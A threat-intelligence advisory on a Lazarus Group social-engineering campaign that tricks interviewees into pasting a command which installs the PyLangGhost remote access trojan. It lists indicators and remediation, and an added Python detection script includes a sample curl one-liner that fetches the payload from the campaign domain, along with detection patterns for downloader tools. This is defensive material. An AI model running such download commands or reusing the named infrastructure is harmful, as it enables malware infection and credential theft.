Severity
High
Analysis Summary
In a newly uncovered social engineering campaign, North Korea’s Lazarus Group has been found leveraging fake camera and microphone errors to trick targets into executing malicious scripts, primarily targeting individuals in the finance and technology sectors. Victims are invited to fake remote interviews or technical assessments that appear to fail due to system issues. Under the pretense of resolving these errors, such as a fake “Race Condition in Windows Camera Discovery Cache,” users are manipulated into pasting shell commands into their terminals or Run dialogs. This initiates the download and execution of a ZIP archive containing a Python-based remote access trojan (RAT), dubbed PyLangGhost.
According to the researchers, unlike traditional phishing or malware delivery techniques, the campaign, named “ClickFix,” relies on real-time deception and human interaction to create a sense of urgency. The user is shown continuous pop-up errors and is prompted to run a one-liner Windows command that silently downloads a ZIP file from a deceptive domain (https://360scanner.store/cam-v-b74si.fix). This archive includes a renamed Python interpreter, a VBScript (update.vbs), and Python modules. The script sets up persistence using the Windows registry key Software\Microsoft\Windows\CurrentVersion\Run\csshost, and contacts a C2 server at IP 151.243.101.229 via HTTP to exfiltrate data or receive commands.
The Python script (nvidia.py) executed by the trojan imports several modules: api.py, command.py, util.py, and auto.py, which handle system interaction, encrypted communication using RC4 and MD5, and credential theft. One of the key capabilities of PyLangGhost is its ability to extract Chrome browser-stored credentials and data from cryptocurrency extensions such as MetaMask and Coinbase Wallet. The malware uses the Windows DPAPI decryption routine and impersonates lsass.exe to bypass security layers, especially in Chrome versions 20 and above. The stolen data is then encrypted into “qpwoe” packets and sent via repeated HTTP POST requests to the attacker's server.
This campaign demonstrates the Lazarus Group’s evolving tradecraft, combining legacy persistence mechanisms with Python's flexibility and obfuscation features to evade traditional antivirus detection; the malware was initially flagged by just 3 out of 60 engines on VirusTotal. Security teams are strongly advised to monitor for abnormal outbound traffic, especially to unfamiliar IPs, implement strict application whitelisting, and conduct user awareness training so that staff do not fall victim to remote "troubleshooting" scams. Behavior-based sandboxing platforms such as Any.Run have proven vital for early detection and analysis of such stealthy threats.
Impact
- Exfiltration of Sensitive Data
- Gain Access
- Security Bypass
Indicators of Compromise
Domain Name
- 360scanner.store
IP
- 151.243.101.229
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Instruct users never to run unfamiliar commands in Terminal, PowerShell, or Run dialogs without verification from IT/security teams.
- Block known malicious IPs, including 151.243.101.229, at the firewall or proxy level.
- Monitor for suspicious outbound HTTP connections to unknown IPs or domains like 360scanner.store.
- Use behavior-based security solutions (e.g., Any.Run, sandboxing tools) to detect unusual script or process behavior.
- Enforce application whitelisting to prevent unauthorized execution of scripts and unknown binaries.
- Restrict PowerShell and VBScript execution through Group Policy or endpoint security settings.
- Audit and monitor Windows Registry keys, especially HKCU\Software\Microsoft\Windows\CurrentVersion\Run for suspicious entries like csshost.
- Use endpoint detection and response (EDR) tools that can flag renamed Python interpreters or unknown binaries.
- Regularly clear browser-stored credentials and discourage storing passwords in web browsers.
- Harden Chrome browser settings and restrict access to sensitive extensions like cryptocurrency wallets.
- Keep systems and browsers updated to prevent privilege escalation through known vulnerabilities.
- Implement network segmentation to limit lateral movement in case of initial infection.
- Enable multi-factor authentication (MFA) on all critical accounts to reduce the impact of credential theft.
- Perform threat hunting for unusual Python executions or VBScript activity in endpoint logs.
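The following triage script is an added example (not from the advisory or any vendor tool) that turns the hunting guidance above and the behaviours described in the Analysis Summary into checks over Sysmon-style events: a renamed Python interpreter (PE OriginalFileName says python.exe but the on-disk name differs), a download one-liner referencing the campaign domain, the csshost Run-key persistence, and contact with the C2 IP. The event dictionaries and field names are constructed to mirror Sysmon ProcessCreate (ID 1), NetworkConnect (ID 3) and RegistryEvent (ID 13) records; the indicators themselves are taken from this advisory.

```python
import re
from typing import Dict, List

# Indicators from the advisory: campaign domain, C2 IP, Run key and value name.
C2_DOMAIN = "360scanner.store"
C2_IP = "151.243.101.229"
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE = "csshost"


def classify(event: Dict[str, str]) -> List[str]:
    """Return detection labels for one Sysmon-style event (constructed schema)."""
    hits: List[str] = []
    eid = event.get("EventID")
    if eid == "1":  # ProcessCreate
        image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
        original = event.get("OriginalFileName", "").lower()
        # Renamed interpreter: PE metadata says python.exe, file name does not.
        if original == "python.exe" and image != "python.exe":
            hits.append("renamed-python-interpreter")
        cmd = event.get("CommandLine", "")
        # ClickFix one-liner: a downloader command pointing at the campaign domain.
        if C2_DOMAIN in cmd and re.search(r"curl|Invoke-WebRequest|iwr|bitsadmin", cmd, re.I):
            hits.append("clickfix-download-oneliner")
    elif eid == "13":  # RegistryEvent: value set under the per-user Run key
        target = event.get("TargetObject", "").lower()
        if RUN_KEY.lower() in target and target.endswith("\\" + RUN_VALUE):
            hits.append("run-key-persistence-csshost")
    elif eid == "3":  # NetworkConnect to the C2 address or domain
        if event.get("DestinationIp") == C2_IP or event.get("DestinationHostname", "").endswith(C2_DOMAIN):
            hits.append("c2-contact")
    return hits


def triage(events: List[Dict[str, str]]) -> List[tuple]:
    """Flatten all (RecordId, label) pairs for an event batch."""
    return [(e["RecordId"], h) for e in events for h in classify(e)]


# Constructed sample events (not real telemetry); the last one is benign.
SAMPLE_EVENTS = [
    {"RecordId": "1", "EventID": "1", "Image": r"C:\Users\u\AppData\Local\Temp\nvidia\csshost.exe",
     "OriginalFileName": "python.exe", "CommandLine": "csshost.exe nvidia.py"},
    {"RecordId": "2", "EventID": "1", "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": "cmd /c curl -o fix.zip https://360scanner.store/cam-v-b74si.fix"},
    {"RecordId": "3", "EventID": "13",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\csshost"},
    {"RecordId": "4", "EventID": "3", "DestinationIp": "151.243.101.229", "DestinationHostname": ""},
    {"RecordId": "5", "EventID": "1", "Image": r"C:\Python312\python.exe", "OriginalFileName": "python.exe",
     "CommandLine": "python.exe script.py"},
]

if __name__ == "__main__":
    for record_id, label in triage(SAMPLE_EVENTS):
        print(record_id, label)
```

Real deployments would feed exported Sysmon or EDR events into `classify` instead of the constructed list; the OriginalFileName comparison is the check that survives the interpreter being renamed to anything at all.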